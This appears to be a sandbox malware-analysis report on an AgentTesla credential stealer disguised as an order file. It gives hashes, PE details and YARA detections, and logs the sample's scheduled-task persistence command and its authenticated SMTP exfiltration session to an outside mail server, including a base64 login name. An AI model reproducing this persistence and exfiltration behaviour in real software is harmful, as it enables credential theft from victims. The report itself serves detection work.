                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....k...............P.................. ........@.. ....................................@.................................l...O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......X...............`%...............................................0..........*....0............ $.cG ..xa%..^E................+.(....(...... .?.Z .P4Ka+...... .... ..xa%..^E................,...+*(.....o..... .,).Z .C6.a+... ..kZ ....a+.*........?@.......0..*..........( ......(!......("......(#......($....*...0..D........ .'.. b.[.a%..^E....!...........+..(....o....(%.... }$D.Z .i oa+..*.0..:.........(&... ..Y. .i.a%..^E................+... .J.IZ D.<a+.*...0..w...

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):7.620214969982571
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    File name:new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                                                                    File size:562688
                                                                    MD5:66cbe976594f666d5440264a4084b21f
                                                                    SHA1:944c8819e41ad59333527141a7fd5180253969e1
                                                                    SHA256:460eb4667362671be2be1e94afe56e73331c3a3cd58b028e49ec135fec8888a9
                                                                    SHA512:1ebb035fd7ceab82f4ee270e66b097958e8b57805897dcafc4736e82e64961ec5df61af8a0ec78d9d119d2ec235d955559cfe360587e46915aa9c5450c93da1e
                                                                    SSDEEP:12288:j2KwyZTuK+jJ8CXnZQ6VlgyoRPWHN3dvos/:jhyVpQ6VG+7v
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....k...............P.................. ........@.. ....................................@................................

                                                                    File Icon

                                                                    Icon Hash:00828e8e8686b000

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x48aabe
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                    Time Stamp:0xAC6B97B1 [Wed Aug 31 16:45:37 2061 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:v4.0.30319
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x8aa6c0x4f.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x8c0000x5a0.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x8e0000xc.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x20000x88ac40x88c00False0.813471206581data7.63105429026IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                    .rsrc0x8c0000x5a00x600False0.421223958333data4.0719135687IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x8e0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountry
                                                                    RT_VERSION0x8c0a00x314data
                                                                    RT_MANIFEST0x8c3b40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                    Imports

                                                                    DLLImport
                                                                    mscoree.dll_CorExeMain

                                                                    Version Infos

                                                                    DescriptionData
                                                                    Translation0x0000 0x04b0
                                                                    LegalCopyrightCopyright 2019
                                                                    Assembly Version1.0.0.0
                                                                    InternalNameVHbIB.exe
                                                                    FileVersion1.0.0.0
                                                                    CompanyName
                                                                    LegalTrademarks
                                                                    Comments
                                                                    ProductNameConnectFour
                                                                    ProductVersion1.0.0.0
                                                                    FileDescriptionConnectFour
                                                                    OriginalFilenameVHbIB.exe

                                                                    Network Behavior

                                                                    Snort IDS Alerts

                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                    12/02/21-16:51:59.303417TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49831587192.168.2.5113.197.35.43

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 2, 2021 16:51:54.780991077 CET49831587192.168.2.5113.197.35.43
                                                                    Dec 2, 2021 16:51:55.049312115 CET58749831113.197.35.43192.168.2.5
                                                                    Dec 2, 2021 16:51:55.049439907 CET49831587192.168.2.5113.197.35.43
                                                                    Dec 2, 2021 16:51:57.680073023 CET58749831113.197.35.43192.168.2.5
                                                                    Dec 2, 2021 16:51:57.680427074 CET49831587192.168.2.5113.197.35.43
                                                                    Dec 2, 2021 16:51:57.948682070 CET58749831113.197.35.43192.168.2.5
                                                                    Dec 2, 2021 16:51:57.948971033 CET58749831113.197.35.43192.168.2.5
                                                                    Dec 2, 2021 16:51:57.949990034 CET49831587192.168.2.5113.197.35.43
                                                                    Dec 2, 2021 16:51:58.218070984 CET58749831113.197.35.43192.168.2.5
                                                                    Dec 2, 2021 16:51:58.218441010 CET49831587192.168.2.5113.197.35.43
                                                                    Dec 2, 2021 16:51:58.487137079 CET58749831113.197.35.43192.168.2.5
                                                                    Dec 2, 2021 16:51:58.487844944 CET49831587192.168.2.5113.197.35.43
                                                                    Dec 2, 2021 16:51:58.756607056 CET58749831113.197.35.43192.168.2.5
                                                                    Dec 2, 2021 16:51:58.756807089 CET49831587192.168.2.5113.197.35.43
                                                                    Dec 2, 2021 16:51:59.032618999 CET58749831113.197.35.43192.168.2.5
                                                                    Dec 2, 2021 16:51:59.032835960 CET49831587192.168.2.5113.197.35.43
                                                                    Dec 2, 2021 16:51:59.302530050 CET58749831113.197.35.43192.168.2.5
                                                                    Dec 2, 2021 16:51:59.303416967 CET49831587192.168.2.5113.197.35.43
                                                                    Dec 2, 2021 16:51:59.303488970 CET49831587192.168.2.5113.197.35.43
                                                                    Dec 2, 2021 16:51:59.304220915 CET49831587192.168.2.5113.197.35.43
                                                                    Dec 2, 2021 16:51:59.304236889 CET49831587192.168.2.5113.197.35.43
                                                                    Dec 2, 2021 16:51:59.572067976 CET58749831113.197.35.43192.168.2.5
                                                                    Dec 2, 2021 16:51:59.572181940 CET58749831113.197.35.43192.168.2.5
                                                                    Dec 2, 2021 16:51:59.805361986 CET58749831113.197.35.43192.168.2.5
                                                                    Dec 2, 2021 16:51:59.845793009 CET49831587192.168.2.5113.197.35.43

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 2, 2021 16:51:53.977710962 CET5039453192.168.2.58.8.8.8
                                                                    Dec 2, 2021 16:51:54.132426977 CET53503948.8.8.8192.168.2.5

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                    Dec 2, 2021 16:51:53.977710962 CET192.168.2.58.8.8.80x6725Standard query (0)mail.kyowasecurity.com.sgA (IP address)IN (0x0001)

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                    Dec 2, 2021 16:51:54.132426977 CET8.8.8.8192.168.2.50x6725No error (0)mail.kyowasecurity.com.sg113.197.35.43A (IP address)IN (0x0001)

                                                                    SMTP Packets

                                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                                    Dec 2, 2021 16:51:57.680073023 CET58749831113.197.35.43192.168.2.5220 spinworksmail2020.spinworks.com.sg ESMTP Postfix
                                                                    Dec 2, 2021 16:51:57.680427074 CET49831587192.168.2.5113.197.35.43EHLO 128757
                                                                    Dec 2, 2021 16:51:57.948971033 CET58749831113.197.35.43192.168.2.5250-spinworksmail2020.spinworks.com.sg
                                                                    250-PIPELINING
                                                                    250-SIZE 30720000
                                                                    250-ETRN
                                                                    250-STARTTLS
                                                                    250-AUTH DIGEST-MD5 CRAM-MD5 PLAIN LOGIN
                                                                    250-ENHANCEDSTATUSCODES
                                                                    250-8BITMIME
                                                                    250-DSN
                                                                    250 CHUNKING
                                                                    Dec 2, 2021 16:51:57.949990034 CET49831587192.168.2.5113.197.35.43AUTH login bWFya2V0aW5nQGt5b3dhc2VjdXJpdHkuY29tLnNn
                                                                    Dec 2, 2021 16:51:58.218070984 CET58749831113.197.35.43192.168.2.5334 UGFzc3dvcmQ6
                                                                    Dec 2, 2021 16:51:58.487137079 CET58749831113.197.35.43192.168.2.5235 2.7.0 Authentication successful
                                                                    Dec 2, 2021 16:51:58.487844944 CET49831587192.168.2.5113.197.35.43MAIL FROM:<marketing@kyowasecurity.com.sg>
                                                                    Dec 2, 2021 16:51:58.756607056 CET58749831113.197.35.43192.168.2.5250 2.1.0 Ok
                                                                    Dec 2, 2021 16:51:58.756807089 CET49831587192.168.2.5113.197.35.43RCPT TO:<marketing@kyowasecurity.com.sg>
                                                                    Dec 2, 2021 16:51:59.032618999 CET58749831113.197.35.43192.168.2.5250 2.1.5 Ok
                                                                    Dec 2, 2021 16:51:59.032835960 CET49831587192.168.2.5113.197.35.43DATA
                                                                    Dec 2, 2021 16:51:59.302530050 CET58749831113.197.35.43192.168.2.5354 End data with <CR><LF>.<CR><LF>
                                                                    Dec 2, 2021 16:51:59.304236889 CET49831587192.168.2.5113.197.35.43.
                                                                    Dec 2, 2021 16:51:59.805361986 CET58749831113.197.35.43192.168.2.5250 2.0.0 Ok: queued as CFC00DFA092

                                                                    Code Manipulations

                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    Analysis Process: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe PID: 4252 Parent PID: 6088

                                                                    General

                                                                    Start time:16:49:48
                                                                    Start date:02/12/2021
                                                                    Path:C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe"
                                                                    Imagebase:0x280000
                                                                    File size:562688 bytes
                                                                    MD5 hash:66CBE976594F666D5440264A4084B21F
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.290045970.0000000003769000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.290045970.0000000003769000.00000004.00000001.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    Chronological Activities

                                                                    Analysis Process: schtasks.exe PID: 2964 Parent PID: 4252

                                                                    General

                                                                    Start time:16:50:01
                                                                    Start date:02/12/2021
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aUkURZiJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8923.tmp
                                                                    Imagebase:0x1270000
                                                                    File size:185856 bytes
                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Analysis Process: conhost.exe PID: 3336 Parent PID: 2964

                                                                    General

                                                                    Start time:16:50:02
                                                                    Start date:02/12/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7ecfc0000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Analysis Process: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe PID: 4792 Parent PID: 4252

                                                                    General

                                                                    Start time:16:50:03
                                                                    Start date:02/12/2021
                                                                    Path:C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:{path}
                                                                    Imagebase:0xa30000
                                                                    File size:562688 bytes
                                                                    MD5 hash:66CBE976594F666D5440264A4084B21F
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.282084634.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.282084634.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.283151659.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.283151659.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.517392444.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.517392444.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.284209429.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.284209429.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.284592595.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.284592595.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.523008375.0000000002DB1000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.523008375.0000000002DB1000.00000004.00000001.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    Chronological Activities

                                                                    Disassembly

                                                                    Code Analysis

                                                                    Reset < >

                                                                      Analysis Process: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe PID: 4252 Parent PID: 6088 new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCOMMON

                                                                      Executed Functions

                                                                      Function 0708D458, Relevance: 5.3, Strings: 4, Instructions: 252COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: /u='$E4W:$J[/J$J[/J
                                                                      • API String ID: 0-1730836407
                                                                      • Opcode ID: 4b25390f63b5dbbd60463509ab9657a3e5d6e27151cc0dfd34f6e170e5cea5fc
                                                                      • Instruction ID: 7302b7c5a0513cba90d7af5041a04c89a8d656853c3f32694f4361f567eec455
                                                                      • Opcode Fuzzy Hash: 4b25390f63b5dbbd60463509ab9657a3e5d6e27151cc0dfd34f6e170e5cea5fc
                                                                      • Instruction Fuzzy Hash: 50A137B4E012098FCB48DFE9C9845DEFBF2FF89310F14966AD415AB384E73499428B54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 070863A0, Relevance: 4.2, Strings: 3, Instructions: 409COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !*y$!*y$ftX
                                                                      • API String ID: 0-3350777166
                                                                      • Opcode ID: b8dc3f96e80749a74367ef7bc1514c835cf49c0f6e61f3c48af11165ce2eed43
                                                                      • Instruction ID: ff7ce0de3051e31fd927dcb7a82f6aa1645befdc756797383e5dd5af5d700dc9
                                                                      • Opcode Fuzzy Hash: b8dc3f96e80749a74367ef7bc1514c835cf49c0f6e61f3c48af11165ce2eed43
                                                                      • Instruction Fuzzy Hash: 8CF1AFB5905286CFC744DFA9D4808EEFFB1FF4A310F298266C455AB216D3359A82CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 070863FB, Relevance: 4.1, Strings: 3, Instructions: 371COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !*y$!*y$ftX
                                                                      • API String ID: 0-3350777166
                                                                      • Opcode ID: 769cd97fae878ae04808e74c234187959f617ff3990eaf8173381df8ca8a1790
                                                                      • Instruction ID: a65d509a225e41ea13dc9ef5c72fd4bf47d2fe587ed2b6d1868fc02fe581d1bb
                                                                      • Opcode Fuzzy Hash: 769cd97fae878ae04808e74c234187959f617ff3990eaf8173381df8ca8a1790
                                                                      • Instruction Fuzzy Hash: FFE1AFB4D05246CFCB44DFA9C4808AEFBB1FF8A310F25C256C555AB216D3359A82CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0708D928, Relevance: 4.1, Strings: 3, Instructions: 362COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (..$(~*z$Lbvw
                                                                      • API String ID: 0-851377781
                                                                      • Opcode ID: d20a57a6207a317e57cb33ad260073691d1c90d5b8620cf7c3b291c4a3875781
                                                                      • Instruction ID: 6e3345c4abea26b07c0088a7d10d95152cc2ec50b133f9c58e605a9d7609584c
                                                                      • Opcode Fuzzy Hash: d20a57a6207a317e57cb33ad260073691d1c90d5b8620cf7c3b291c4a3875781
                                                                      • Instruction Fuzzy Hash: F9D1A3B1F00206DFCB44EFE9D5406AEBBF6EF89254F248629C455BB384EB3499418B91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 070864A0, Relevance: 4.0, Strings: 3, Instructions: 296COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !*y$!*y$ftX
                                                                      • API String ID: 0-3350777166
                                                                      • Opcode ID: 3017729069a2ae4025e816968ec1253b81a059edd0d3d20314412a4e6f7d1032
                                                                      • Instruction ID: 98f5c7eb1dd2e5c45ba61d3a065382cb84402a927b90448cd84986b5626b479a
                                                                      • Opcode Fuzzy Hash: 3017729069a2ae4025e816968ec1253b81a059edd0d3d20314412a4e6f7d1032
                                                                      • Instruction Fuzzy Hash: A9D149B4E1020ACFCB44DF99C5809AEFBB6FF89300F158665D516AB319D7359A82CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 07080040, Relevance: 3.8, Strings: 1, Instructions: 2589COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `pv
                                                                      • API String ID: 0-567263181
                                                                      • Opcode ID: 671024a63e45efeeaf7d0f6f89d47e70e619d34cc8cba3a61a7a6d8fbb55ae3f
                                                                      • Instruction ID: b7b12406f0a4d2909317e99f47a09f4e355c6b696fe7e1368cbd0f5ee07c236d
                                                                      • Opcode Fuzzy Hash: 671024a63e45efeeaf7d0f6f89d47e70e619d34cc8cba3a61a7a6d8fbb55ae3f
                                                                      • Instruction Fuzzy Hash: 0C4300B4A01219CFCBA4DF68C988A9DB7B6FF85314F158699D449AB360DB30ED81CF41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 025598E8, Relevance: 1.9, Strings: 1, Instructions: 662COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.287767920.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0|v
                                                                      • API String ID: 0-3787906673
                                                                      • Opcode ID: 4dcb06da82c91a86dd74d1d0a5386c5cfa35784897fd5c5f3fd75466604f5a08
                                                                      • Instruction ID: 5294244a186fdf59c2f63330b8d57e8a578a5ac1bdc776ad47bd9e066d5b2fcd
                                                                      • Opcode Fuzzy Hash: 4dcb06da82c91a86dd74d1d0a5386c5cfa35784897fd5c5f3fd75466604f5a08
                                                                      • Instruction Fuzzy Hash: 33527A31A0062ACFDB14CF54C890AAEB7B6FF44304F5188AAE919AB251D774FD85CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 07083E9B, Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: f"A2
                                                                      • API String ID: 0-628476553
                                                                      • Opcode ID: c64bcb0f397b5ab4464e45068ccd0fd6e7acc269065df40047cf14df78cc34d3
                                                                      • Instruction ID: 61e456dc878f5b58e2f39810b4d634f612b58ec67e8e2a66b387879af9eb5fe5
                                                                      • Opcode Fuzzy Hash: c64bcb0f397b5ab4464e45068ccd0fd6e7acc269065df40047cf14df78cc34d3
                                                                      • Instruction Fuzzy Hash: F5A13674E052498FDB44CFA9C880ADEFFB2EF8A310F24816AD855AB325D7305946CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 07083EF1, Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: f"A2
                                                                      • API String ID: 0-628476553
                                                                      • Opcode ID: 2e11e2d5613d46a76d02bb94cde3c988f3659df03e6f6956266d971868327ff8
                                                                      • Instruction ID: 2670e5b10546ef6d15d34d69a940e354548a522c39dbb00a9846a4e1a98735ef
                                                                      • Opcode Fuzzy Hash: 2e11e2d5613d46a76d02bb94cde3c988f3659df03e6f6956266d971868327ff8
                                                                      • Instruction Fuzzy Hash: D6A154B0E052498FDB44CFA9C880AEEFBF2EF8A300F14816AD455AB325D7345946CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 07083F40, Relevance: 1.4, Strings: 1, Instructions: 189COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: f"A2
                                                                      • API String ID: 0-628476553
                                                                      • Opcode ID: 6609e95e3eca934086924836841295b08f52505b082d797b42ea4615ff919d5c
